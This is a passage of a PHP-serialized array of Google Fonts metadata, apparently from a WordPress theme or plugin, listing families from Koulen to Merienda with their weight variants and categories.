One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Koulen\";a:3:{s:5:\"label\";s:6:\"Koulen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Kranky\";a:3:{s:5:\"label\";s:6:\"Kranky\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Kreon\";a:3:{s:5:\"label\";s:5:\"Kreon\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Kristi\";a:3:{s:5:\"label\";s:6:\"Kristi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Krona One\";a:3:{s:5:\"label\";s:9:\"Krona One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Krub\";a:3:{s:5:\"label\";s:4:\"Krub\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Kufam\";a:3:{s:5:\"label\";s:5:\"Kufam\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Kulim Park\";a:3:{s:5:\"label\";s:10:\"Kulim Park\";s:8:\"variants\";a:10:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kumar One\";a:3:{s:5:\"label\";s:9:\"Kumar One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Kumar One Outline\";a:3:{s:5:\"label\";s:17:\"Kumar One Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Kumbh Sans\";a:3:{s:5:\"label\";s:10:\"Kumbh Sans\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Kurale\";a:3:{s:5:\"label\";s:6:\"Kurale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"La Belle Aurore\";a:3:{s:5:\"label\";s:15:\"La Belle Aurore\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Lacquer\";a:3:{s:5:\"label\";s:7:\"Lacquer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Laila\";a:3:{s:5:\"label\";s:5:\"Laila\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lakki Reddy\";a:3:{s:5:\"label\";s:11:\"Lakki Reddy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Lalezar\";a:3:{s:5:\"label\";s:7:\"Lalezar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Lancelot\";a:3:{s:5:\"label\";s:8:\"Lancelot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Langar\";a:3:{s:5:\"label\";s:6:\"Langar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Lateef\";a:3:{s:5:\"label\";s:6:\"Lateef\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Lato\";a:3:{s:5:\"label\";s:4:\"Lato\";s:8:\"variants\";a:10:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"League Script\";a:3:{s:5:\"label\";s:13:\"League Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Leckerli One\";a:3:{s:5:\"label\";s:12:\"Leckerli One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Ledger\";a:3:{s:5:\"label\";s:6:\"Ledger\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Lekton\";a:3:{s:5:\"label\";s:6:\"Lekton\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Lemon\";a:3:{s:5:\"label\";s:5:\"Lemon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Lemonada\";a:3:{s:5:\"label\";s:8:\"Lemonada\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Lexend\";a:3:{s:5:\"label\";s:6:\"Lexend\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Deca\";a:3:{s:5:\"label\";s:11:\"Lexend Deca\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Lexend Exa\";a:3:{s:5:\"label\";s:10:\"Lexend Exa\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Giga\";a:3:{s:5:\"label\";s:11:\"Lexend Giga\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Mega\";a:3:{s:5:\"label\";s:11:\"Lexend Mega\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Peta\";a:3:{s:5:\"label\";s:11:\"Lexend Peta\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Tera\";a:3:{s:5:\"label\";s:11:\"Lexend Tera\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Lexend Zetta\";a:3:{s:5:\"label\";s:12:\"Lexend Zetta\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Libre Barcode 128\";a:3:{s:5:\"label\";s:17:\"Libre Barcode 128\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:22:\"Libre Barcode 128 Text\";a:3:{s:5:\"label\";s:22:\"Libre Barcode 128 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Libre Barcode 39\";a:3:{s:5:\"label\";s:16:\"Libre Barcode 39\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:25:\"Libre Barcode 39 Extended\";a:3:{s:5:\"label\";s:25:\"Libre Barcode 39 Extended\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:30:\"Libre Barcode 39 Extended Text\";a:3:{s:5:\"label\";s:30:\"Libre Barcode 39 Extended Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:21:\"Libre Barcode 39 Text\";a:3:{s:5:\"label\";s:21:\"Libre Barcode 39 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:24:\"Libre Barcode EAN13 Text\";a:3:{s:5:\"label\";s:24:\"Libre Barcode EAN13 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Libre Baskerville\";a:3:{s:5:\"label\";s:17:\"Libre Baskerville\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Libre Caslon Display\";a:3:{s:5:\"label\";s:20:\"Libre Caslon Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Libre Caslon Text\";a:3:{s:5:\"label\";s:17:\"Libre Caslon Text\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Libre Franklin\";a:3:{s:5:\"label\";s:14:\"Libre Franklin\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Licorice\";a:3:{s:5:\"label\";s:8:\"Licorice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Life Savers\";a:3:{s:5:\"label\";s:11:\"Life Savers\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Lilita One\";a:3:{s:5:\"label\";s:10:\"Lilita One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Lily Script One\";a:3:{s:5:\"label\";s:15:\"Lily Script One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Limelight\";a:3:{s:5:\"label\";s:9:\"Limelight\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Linden Hill\";a:3:{s:5:\"label\";s:11:\"Linden Hill\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Literata\";a:3:{s:5:\"label\";s:8:\"Literata\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Liu Jian Mao Cao\";a:3:{s:5:\"label\";s:16:\"Liu Jian Mao Cao\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Livvic\";a:3:{s:5:\"label\";s:6:\"Livvic\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Lobster\";a:3:{s:5:\"label\";s:7:\"Lobster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Lobster Two\";a:3:{s:5:\"label\";s:11:\"Lobster Two\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Londrina Outline\";a:3:{s:5:\"label\";s:16:\"Londrina Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Londrina Shadow\";a:3:{s:5:\"label\";s:15:\"Londrina Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Londrina Sketch\";a:3:{s:5:\"label\";s:15:\"Londrina Sketch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Londrina Solid\";a:3:{s:5:\"label\";s:14:\"Londrina Solid\";s:8:\"variants\";a:4:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"900\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Long Cang\";a:3:{s:5:\"label\";s:9:\"Long Cang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Lora\";a:3:{s:5:\"label\";s:4:\"Lora\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Love Light\";a:3:{s:5:\"label\";s:10:\"Love Light\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:21:\"Love Ya Like A Sister\";a:3:{s:5:\"label\";s:21:\"Love Ya Like A Sister\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Loved by the King\";a:3:{s:5:\"label\";s:17:\"Loved by the King\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Lovers Quarrel\";a:3:{s:5:\"label\";s:14:\"Lovers Quarrel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Luckiest Guy\";a:3:{s:5:\"label\";s:12:\"Luckiest Guy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Lusitana\";a:3:{s:5:\"label\";s:8:\"Lusitana\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Lustria\";a:3:{s:5:\"label\";s:7:\"Lustria\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Luxurious Roman\";a:3:{s:5:\"label\";s:15:\"Luxurious Roman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Luxurious Script\";a:3:{s:5:\"label\";s:16:\"Luxurious Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"M PLUS 1\";a:3:{s:5:\"label\";s:8:\"M PLUS 1\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"M PLUS 1 Code\";a:3:{s:5:\"label\";s:13:\"M PLUS 1 Code\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"M PLUS 1p\";a:3:{s:5:\"label\";s:9:\"M PLUS 1p\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"M PLUS 2\";a:3:{s:5:\"label\";s:8:\"M PLUS 2\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"M PLUS Code Latin\";a:3:{s:5:\"label\";s:17:\"M PLUS Code Latin\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"M PLUS Rounded 1c\";a:3:{s:5:\"label\";s:17:\"M PLUS Rounded 1c\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Ma Shan Zheng\";a:3:{s:5:\"label\";s:13:\"Ma Shan Zheng\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Macondo\";a:3:{s:5:\"label\";s:7:\"Macondo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Macondo Swash Caps\";a:3:{s:5:\"label\";s:18:\"Macondo Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Mada\";a:3:{s:5:\"label\";s:4:\"Mada\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Magra\";a:3:{s:5:\"label\";s:5:\"Magra\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Maiden Orange\";a:3:{s:5:\"label\";s:13:\"Maiden Orange\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Maitree\";a:3:{s:5:\"label\";s:7:\"Maitree\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Major Mono Display\";a:3:{s:5:\"label\";s:18:\"Major Mono Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:4:\"Mako\";a:3:{s:5:\"label\";s:4:\"Mako\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Mali\";a:3:{s:5:\"label\";s:4:\"Mali\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Mallanna\";a:3:{s:5:\"label\";s:8:\"Mallanna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Mandali\";a:3:{s:5:\"label\";s:7:\"Mandali\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Manjari\";a:3:{s:5:\"label\";s:7:\"Manjari\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Manrope\";a:3:{s:5:\"label\";s:7:\"Manrope\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Mansalva\";a:3:{s:5:\"label\";s:8:\"Mansalva\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Manuale\";a:3:{s:5:\"label\";s:7:\"Manuale\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Marcellus\";a:3:{s:5:\"label\";s:9:\"Marcellus\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Marcellus SC\";a:3:{s:5:\"label\";s:12:\"Marcellus SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Marck Script\";a:3:{s:5:\"label\";s:12:\"Marck Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Margarine\";a:3:{s:5:\"label\";s:9:\"Margarine\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Markazi Text\";a:3:{s:5:\"label\";s:12:\"Markazi Text\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Marko One\";a:3:{s:5:\"label\";s:9:\"Marko One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Marmelad\";a:3:{s:5:\"label\";s:8:\"Marmelad\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Martel\";a:3:{s:5:\"label\";s:6:\"Martel\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Martel Sans\";a:3:{s:5:\"label\";s:11:\"Martel Sans\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Marvel\";a:3:{s:5:\"label\";s:6:\"Marvel\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Mate\";a:3:{s:5:\"label\";s:4:\"Mate\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Mate SC\";a:3:{s:5:\"label\";s:7:\"Mate SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Maven Pro\";a:3:{s:5:\"label\";s:9:\"Maven Pro\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"McLaren\";a:3:{s:5:\"label\";s:7:\"McLaren\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Mea Culpa\";a:3:{s:5:\"label\";s:9:\"Mea Culpa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Meddon\";a:3:{s:5:\"label\";s:6:\"Meddon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"MedievalSharp\";a:3:{s:5:\"label\";s:13:\"MedievalSharp\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Medula One\";a:3:{s:5:\"label\";s:10:\"Medula One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Meera Inimai\";a:3:{s:5:\"label\";s:12:\"Meera Inimai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Megrim\";a:3:{s:5:\"label\";s:6:\"Megrim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Meie Script\";a:3:{s:5:\"label\";s:11:\"Meie Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Meow Script\";a:3:{s:5:\"label\";s:11:\"Meow Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Merienda\";a:3:{s:5:\"label\";s:8:\"Merienda\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Merienda 